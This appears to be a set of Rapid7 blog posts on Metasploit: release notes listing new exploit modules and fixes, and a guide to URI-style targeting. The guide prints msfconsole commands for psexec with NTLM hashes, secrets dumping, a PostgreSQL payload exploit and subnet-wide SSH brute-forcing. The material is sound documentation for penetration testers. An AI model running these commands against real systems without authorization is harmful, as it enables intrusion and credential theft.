  • #15630 from zeroSteiner – This adds the option DB_SKIP_EXISTING to the AuthBrute mixin to give users the option to skip credentials already in the database when performing brute force attacks.
  • #15669 from adfoster-r7 – Updates the multi/manage/screenshare module to use the Espia screenshot capabilities if present, and to gracefully fallback to using the normal screenshot behavior if it fails to load as expected.
  • #15721 from zeroSteiner – Support has been added into Metasploit for negotiating SSL connections over multiple connections types including Meterpreter and SSH. As a result, users can now make HTTPS requests over pivoted sessions. Previously, if users tried to make such connections, they would be sent via plaintext instead of being SSL encrypted.
  • #15722 from adfoster-r7 – The rerun command has been enhanced to support tab completion.
  • #15726 from zeroSteiner – This adds the MeterpreterTryToFork option to the Mettle payloads. When set, it translates to Mettle’s :background option. When :persist is not configured it will attempt to fork the stage into the background.

Bugs fixed

  • #15703 from space-r7 – This updates payload/windows/x64/encrypted_shell/reverse_tcp to no longer crash on MacOS. Additionally adds an advanced option, ShowCompileCMD, that prints the compilation command used.
  • #15720 from NeffIsBack – This fixes a bug where the rhost value was incorrectly passed to the underlying scanning script, resulting in an abnormal exit.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Adam Galway original https://blog.rapid7.com/2021/09/24/metasploit-wrap-up-131/

Vulnerability is in the eye of the beholder

Metasploit Wrap-Up

Exploiting firmware authored by UDP Technology and provided to multiple large OEMs (including Geutebruck), community contributor TrGFxX has authored a neat module that allows RCE as root on machines running the web interface of the Geutebruck G-Cam and G-Code products. For more information on the vulnerability check out the CISA advisory.

OpManager exploit is OP plz nerf

Our very own zeroSteiner authored a module implementing both an exploit and patch bypass for a Java deserialization vulnerability that exists in numerous versions of ManageEngine’s OpManager software. This module allows payload execution as either NT AUTHORITY\SYSTEM on Windows or root on Linux. On top of this new module, zeroSteiner made improvements to help utilize the increasingly essential YSoSerial tool. You should definitely check it out if you’re interested in exploring other Java deserialization vulns.

Putting the Win in WinRM

In a big win for Metasploit, community contributor smashery finished off their month-long effort to get fully functional shells working across WinRM! These new sessions support post modules, NTLMSSP authentication, and are also able to run without a payload in remote memory, making these sessions pretty hard to detect. This is a major improvement over the previous WinRM implementation that only supported execution of a single command, so huge thanks again to smashery.

You can tell a lot about a protocol from its handshake

In one final noteworthy addition, smashery has once again come through with a PR that significantly improves our RDP library. Metasploit users can now capture the NETBIOS computer name, NETBIOS domain name, DNS computer name, DNS domain name, and OS version from the NTLM handshake carried out over RDP, and our rdp_scanner module has been updated to display this info to all the RDP sniffers out there.

New module content (3)

Enhancements and features

  • #15684 from adfoster-r7 – This improves interactive shell performance for pasted user input.
  • #15696 from smashery – This updates the RDP scanner module to extract and show additional information gathered from the NTLM handshake used for Network Level Authentication (NLA).
  • #15632 from smashery – This improves Metasploit’s WinRM capabilities by allowing shell sessions to be established over the protocol. The shell sessions are interactive and are usable with post modules.

Bugs fixed

  • #15600 from agalway-r7 – This fixes an issue with encrypted payloads during session setup. The logic that gathers session info is now located in the bootstrap method, which ensures that this functionality is always carried out before any commands are sent.
  • #15666 from timwr – This fixes an issue found in Meterpreter’s download functionality where downloading a file with a name containing unicode characters would fail due to incompatible encoding.
  • #15679 from nvn1729 – This fixes a bug where the tomcat_mgr_upload module was not correctly undeploying the app after exploitation occurred.
  • #15686 from jmartin-r7 – This fixes a crash in msfrpc that occurs due to the exploit/linux/misc/saltstack_salt_unauth_rce module’s MINIONS option default being a regex instead of a string.
  • #15695 from adfoster-r7 – This fixes a crash in the exploit/unix/local/setuid_nmap module and adds logging to print the result of the exploit’s last command so the user knows what happened in the event of a failure.
  • #15697 from smashery – This updates the HTTP NTLM information enumeration module to use the Net::NTLM library for consistent data processing without a custom parser.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Easier URI Targeting With Metasploit Framework

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2021/09/23/metasploit-uri-support/

Easier URI Targeting With Metasploit Framework

Over the past year and a half, Metasploit Framework’s core engineering team in Belfast has made significant improvements to usability, discoverability, and the general quality of life for the global community of Framework users. A few of the enhancements we’ve worked on in MSF 6 include:

  • A handy tip command in msfconsole that delivers tips n’ tricks to users
  • Consolidated EternalBlue modules that removed the need for Python as a dependency, as well as automatic targeting support
  • AutoCheck support, which runs the check functionality of a module before its exploit capabilities are executed to ensure the module will work beforehand, as well as providing a ForceExploit advanced option that allows a user-override this functionality
  • A debug command in msfconsole that provides data to help users understand the root cause of issues
  • Improved cross-platform support for msfdb, as well as supporting external databases — such as using a PostgreSQL Docker container
  • User experience improvements, including word-wrapping tables, highlighting matched search terms in the search table, and introducing context-aware hints — such as letting users know that they can use the use command to easily select a searched module
  • Reducing msfconsole’s boot time, as well as reducing the time required to search for modules, and list exploits/payloads in both the console and module.search RPC calls

Today’s blog looks at another series of improvements that have overhauled Framework’s option support to allow for streamlined workflows when specifying multiple module options for protocols like HTTP, MySQL, PostgreSQL, SMB, SSH, and more. This removes the need to individually call set for each module option value before running it — courtesy of pull request #15253.

Overview

Traditional usage of Metasploit involves loading a module and setting multiple options:

use exploit/linux/postgres/postgres_payload

set username administrator

set password pass

set rhost 192.168.123.6

set rport 5432

set database postgres

set lhost 192.168.123.1

set lport 5000

run

You could also specify multiple RHOSTS separated by spaces, or with a CIDR subnet mask:

set rhosts 127.0.0.1 127.0.0.2

set rhosts 127.0.0.1/24

URI support for RHOSTS

As of Metasploit 6.1.4, users can now supply URI strings as arguments to the run command to specify RHOST values and option values at once:

use exploit/linux/postgres/postgres_payload

run postgres://administrator:[email protected] lhost=192.168.123.1 lport=5000

This new workflow will not only make it easier to use reverse-i-search with CTRL+R in Metasploit’s console — it will also make it easier to share cheat sheets among pentesters.

SMB examples

There’s a full page of documentation and examples in the Metasploit Wiki, but here are a few highlights that show the improvements.

Running psexec against a target host:

use exploit/windows/smb/psexec

run smb://user:[email protected] lhost=192.168.123.1 lport=5000

run “smb://user:pass with [email protected]” lhost=192.168.123.1 lport=5000

Running psexec with NTLM hashes:

use exploit/windows/smb/psexec

run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected] lhost=10.10.14.13 lport=5000

Dumping secrets with NTLM hashes:

use auxiliary/gather/windows_secrets_dump

run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected]

Downloading a file:

use auxiliary/admin/smb/download_file

run smb://a:[email protected]/my_share/helloworld.txt

Uploading a file:

use auxiliary/admin/smb/upload_file

echo “my file” > local_file.txt

run smb://a:[email protected]/my_share/remote_file.txt lpath=./local_file.txt

SSH examples

If you have valid SSH credentials, the ssh_login module will open a Metasploit session for you:

use scanner/ssh/ssh_login

run ssh://user:[email protected]

Brute-force host with known user and password list:

use scanner/ssh/ssh_login

run ssh://[email protected] threads=50 pass_file=./rockyou.txt

Brute-force credentials:

use scanner/ssh/ssh_login

run ssh://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt

Brute-force credentials in a subnet:

use scanner/ssh/ssh_login

run cidr:/24:ssh://user:[email protected] threads=50

run cidr:/24:ssh://[email protected] threads=50 pass_file=./rockyou.txt

It’s also now possible to port forward through a Metasploit SSH session:

route add 172.18.103.0/24 ssh_session_id

More examples

Full details and examples can be found within the Metasploit Wiki. At the time of release, the following protocols are now supported:

  • cidr – Can be combined with other protocols to specify address subnet mask
  • length
  • file – Load a series of RHOST values separated by newlines from a file (this file can also include URI strings)
  • http
  • https
  • mysql
  • postgres
  • smb
  • ssh

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.